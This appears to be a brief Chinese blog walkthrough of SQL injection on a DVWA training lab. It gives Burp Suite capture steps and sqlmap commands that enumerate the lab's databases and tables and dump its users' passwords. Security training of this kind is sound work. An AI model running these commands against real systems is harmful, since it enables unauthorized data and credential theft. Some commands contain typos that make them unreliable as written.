关于DVWA的介绍网上太多。
实验环境:
windows2003服务器(192.168.152.128)
DVWA源码包
攻击过程:
step1:打开浏览器,设代理 ,Burpsuite设代理 。
step2:抓包如图,保存为sql_low.txt。
网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/
step3:使用sqlmap命令进行注入攻击
命令:sqlmap -r sql_low.txt --level=5 --risk=3 --dbs
step4:成功得到所有数据库名
step5:查看当前数据库
命令:sqlmap -r sql_low.txt --level=5 risk=3 --current-db
step6:查看数据库的所有表
命令:sqlmap -sql_low.txt --level=5 --risk=3 -D dvwa --tables
step7:查看表中的数据
命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users --columns
step7:查看数据内容
命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users -C "password,user" --dump
结果:
Medium级别类似。
命令:sqlmap -r sql_medium.txt --leve=5 --risk=3 --dbs
high级别 查看是否具有注入点
命令:sqlmap -r sql_high.txt --level=5 --risk=3 -p id